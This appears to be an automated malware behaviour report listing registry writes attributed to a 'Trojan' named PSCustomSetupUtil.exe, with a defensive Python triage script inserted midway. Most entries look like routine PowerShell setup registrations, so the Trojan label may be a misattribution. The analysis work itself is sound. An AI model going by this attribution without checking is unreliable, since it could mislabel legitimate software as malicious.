[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "1C F1 C1 EC C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "197"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "198"
"StoreChangeIDFor64BitProcesses" = "176"
"StoreChangeIDFor32BitProcesses" = "197"
The process PSCustomSetupUtil.exe:1096 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F F1 A2 86 85 2D 41 E0 4B FD 9A 55 4A E1 73 36"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "48 9D 2F ED C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "200"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "201"
"StoreChangeIDFor64BitProcesses" = "179"
"StoreChangeIDFor32BitProcesses" = "200"
The process PSCustomSetupUtil.exe:2824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "06 AB 13 57 5E 75 E4 D2 25 AE 89 FF B4 80 B5 8D"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "B8 89 2D F2 C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "210"
"StoreChangeIDFor64BitProcesses" = "188"
"StoreChangeIDFor32BitProcesses" = "209"
The process PSCustomSetupUtil.exe:4024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 2E 40 93 98 AC C1 97 80 36 DF 8F 31 AE F0 C0"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "60 50 5C EB C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "189"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "190"
"StoreChangeIDFor64BitProcesses" = "168"
"StoreChangeIDFor32BitProcesses" = "189"
The process PSCustomSetupUtil.exe:252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 94 4A 69 C9 93 8F 6A C8 55 BA BA 6B 71 51 F5"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Runtime, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "193"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL" = "FC 34 03 EC C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "194"
"StoreChangeIDFor64BitProcesses" = "172"
"StoreChangeIDFor32BitProcesses" = "193"
The process PSCustomSetupUtil.exe:2800 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B 77 E9 75 74 BE E7 C1 A6 81 C6 10 F6 AD DF F2"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "208"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "209"
"Microsoft.PowerShell.Editor.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "64 9F 02 F2 C7 D0 D1 01"
"StoreChangeIDFor64BitProcesses" = "187"
"StoreChangeIDFor32BitProcesses" = "208"
The process PSCustomSetupUtil.exe:796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 2C 3B 04 F4 1E 84 AF BB 1F 11 B6 6D 44 BB AA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "8E 60 53 ED C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "201"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "202"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "180"
"StoreChangeIDFor32BitProcesses" = "201"
The process PSCustomSetupUtil.exe:4064 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DE CF E7 BB 6B C5 E3 BB 05 CC 98 D2 95 6B BF BC"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "190"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL" = "B4 3A 87 EB C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "191"
"StoreChangeIDFor64BitProcesses" = "169"
"StoreChangeIDFor32BitProcesses" = "190"
The process PSCustomSetupUtil.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 EB 8E 39 64 1F 48 42 08 64 3D 8F 6E 95 FE E6"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "1A BA 69 EC C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "195"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "196"
"StoreChangeIDFor64BitProcesses" = "174"
"StoreChangeIDFor32BitProcesses" = "195"
The process PSCustomSetupUtil.exe:2648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A D5 A9 2E 0D 32 BD 88 65 CB B4 5F F7 93 25 9F"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "06 CF 4F F1 C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "204"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "205"
"StoreChangeIDFor64BitProcesses" = "183"
"StoreChangeIDFor32BitProcesses" = "204"
The process PSCustomSetupUtil.exe:4092 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 2F DB 57 A9 C9 5E 5F 75 DA B5 FA 46 68 C2 52"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL" = "AE C2 AF EB C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "191"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "192"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "170"
"StoreChangeIDFor32BitProcesses" = "191"
The process PSCustomSetupUtil.exe:584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 5F 60 C0 F2 C6 61 FF 7E 5F AE 85 0C 3A 5A D4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "199"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "200"
"Microsoft.PowerShell.Commands.Utility.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "5C 3C 0E ED C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "178"
"StoreChangeIDFor32BitProcesses" = "199"
The process PSCustomSetupUtil.exe:2708 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D 07 BD 62 A8 97 D0 EC B2 A8 C2 56 BB CB 7B CD"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35,MSIL" = "B4 1B 7D F1 C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "205"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "206"
"StoreChangeIDFor64BitProcesses" = "184"
"StoreChangeIDFor32BitProcesses" = "205"
The process PSCustomSetupUtil.exe:2624 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B 9A 65 7C 05 EC C3 01 A1 BB DF 35 1A F3 6B D3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process PSCustomSetupUtil.exe:2568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F B8 DD A8 CD 8A B8 5D 67 98 11 45 8D 8E 41 FD"
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"Path" = "C:\Perl\site\bin;C:\Perl\bin;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;c:\Program Files\Wireshark;%System%\WindowsPowerShell\v1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process PSCustomSetupUtil.exe:2608 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 63 C1 9F CC 26 46 B8 93 B5 AB 80 6F E8 C5 D0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PATHEXT" = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.PSC1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
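The two Session Manager\Environment writes above (a new system PATH entry and ".PSC1" appended to PATHEXT) are the entries in this listing that change how every later process on the machine resolves commands, yet they are buried among hundreds of RNG Seed, Shell Folders and Fusion index writes. The following script is an added example, not part of the Lavasoft report: it parses the report's own "[key]" / "name" = "value" listing, drops the per-process noise, and pulls out environment changes, GAC assembly registrations and key deletions with the process that made each. The embedded sample is a constructed excerpt copied from this page's listing; the stock Windows XP PATHEXT baseline and the choice of which keys count as noise are this example's assumptions.

```python
import re

# Constructed excerpt in the report's own format: a handful of entries copied
# from the listing on this page, abbreviated. Not the full report.
SAMPLE_REPORT = r'''
The process PSCustomSetupUtil.exe:2568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F B8 DD A8 CD 8A B8 5D 67 98 11 45 8D 8E 41 FD"
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"Path" = "C:\Perl\site\bin;C:\Perl\bin;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;c:\Program Files\Wireshark;%System%\WindowsPowerShell\v1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process PSCustomSetupUtil.exe:2608 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PATHEXT" = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.PSC1"
The process PSCustomSetupUtil.exe:2696 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35,MSIL" = "08 06 A8 F1 C7 D0 D1 01"
The process mscorsvw.exe:2008 makes changes in the system registry.
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index58]
'''

PROCESS_RE = re.compile(r'^The process (\S+) makes changes in the system registry\.$')
KEY_RE = re.compile(r'^\[(.+)\]$')
VALUE_RE = re.compile(r'^"([^"]*)" = "(.*)"$')
DELETE_HEADER = 'The Trojan deletes the following registry key(s):'

# Assumed baseline: PATHEXT of a stock Windows XP SP3 install (not from the report).
XP_DEFAULT_PATHEXT = '.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH'
ENV_KEY = r'HKLM\System\CurrentControlSet\Control\Session Manager\Environment'
# Keys any CryptoAPI user or shell-path lookup rewrites; treated as noise (assumption).
NOISE_KEYS = (r'HKLM\SOFTWARE\Microsoft\Cryptography\RNG', r'\Explorer\Shell Folders')


def parse_registry_changes(text):
    """Turn the report listing into (process, action, key, name, value) tuples."""
    events, process, action, key = [], None, 'set', None
    for line in (raw.strip() for raw in text.splitlines()):
        if not line:
            continue
        m = PROCESS_RE.match(line)
        if m:
            process, action, key = m.group(1), 'set', None
        elif line == DELETE_HEADER:
            action = 'delete'
        elif line.endswith('values in system registry:'):
            action = 'set'
        elif (m := KEY_RE.match(line)):
            key = m.group(1)
            if action == 'delete':  # deletions carry only the key, no values
                events.append((process, 'delete', key, None, None))
        elif (m := VALUE_RE.match(line)) and key is not None and action == 'set':
            events.append((process, 'set', key, m.group(1), m.group(2)))
    return events


def triage(events):
    """Keep what a responder acts on: env-var changes, GAC installs, key deletions."""
    findings = {'path_additions': [], 'pathext_additions': [],
                'gac_assemblies': [], 'deleted_keys': []}
    for process, action, key, name, value in events:
        if any(noise.lower() in key.lower() for noise in NOISE_KEYS):
            continue
        if action == 'delete':
            findings['deleted_keys'].append((process, key))
        elif key.lower() == ENV_KEY.lower() and name.lower() == 'path':
            # Entries outside %SystemRoot% widen command lookup for every later process.
            extra = [p for p in value.split(';')
                     if p and not p.lower().startswith('%systemroot%')]
            findings['path_additions'].append((process, extra))
        elif key.lower() == ENV_KEY.lower() and name.lower() == 'pathext':
            # New extensions become directly executable by name from any shell.
            baseline = set(XP_DEFAULT_PATHEXT.upper().split(';'))
            added = [e for e in value.upper().split(';') if e and e not in baseline]
            findings['pathext_additions'].append((process, added))
        elif 'GACChangeNotification' in key and name.count(',') == 4:
            # Value name format: <assembly>,<version>,<culture>,<publickeytoken>,<arch>
            asm, ver, _culture, token, _arch = name.split(',')
            findings['gac_assemblies'].append((process, asm, ver, token))
    return findings


if __name__ == '__main__':
    for category, items in triage(parse_registry_changes(SAMPLE_REPORT)).items():
        print(category)
        for item in items:
            print('  ', item)
```

Run as-is it reports the PATH entries outside %SystemRoot% (including the new WindowsPowerShell\v1.0 directory), ".PSC1" as the only extension added beyond the XP baseline, the GAC-registered Microsoft.PowerShell.GPowerShell assembly with its public key token, and the deleted NativeImagesIndex key. To use it on the full page, paste the listing into SAMPLE_REPORT or read it from a file; the public key token 31bf3856ad364e35 seen on every assembly here is worth matching against the token you expect from the vendor whose installer this claims to be.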
The process PSCustomSetupUtil.exe:2696 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 0E 8E 3F 90 86 1F A0 FD 1D 80 20 35 85 49 E0"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "206"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35,MSIL" = "08 06 A8 F1 C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "207"
"StoreChangeIDFor64BitProcesses" = "185"
"StoreChangeIDFor32BitProcesses" = "206"
The process PSCustomSetupUtil.exe:1880 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CB 03 50 48 10 67 06 F9 19 71 9B F3 8C 11 2B B5"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "2E 86 79 ED C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "202"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "203"
"StoreChangeIDFor64BitProcesses" = "181"
"StoreChangeIDFor32BitProcesses" = "202"
The process PSCustomSetupUtil.exe:1992 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0A 62 C5 22 B3 57 C9 03 38 EF 1C 2E 17 72 4F E5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "196"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "197"
"System.Management.Automation.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "22 69 99 EC C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "175"
"StoreChangeIDFor32BitProcesses" = "196"
The process PSCustomSetupUtil.exe:1540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB ED CD 6B FA CA F6 FB 90 BA 5C 6C 4D 94 EB FA"
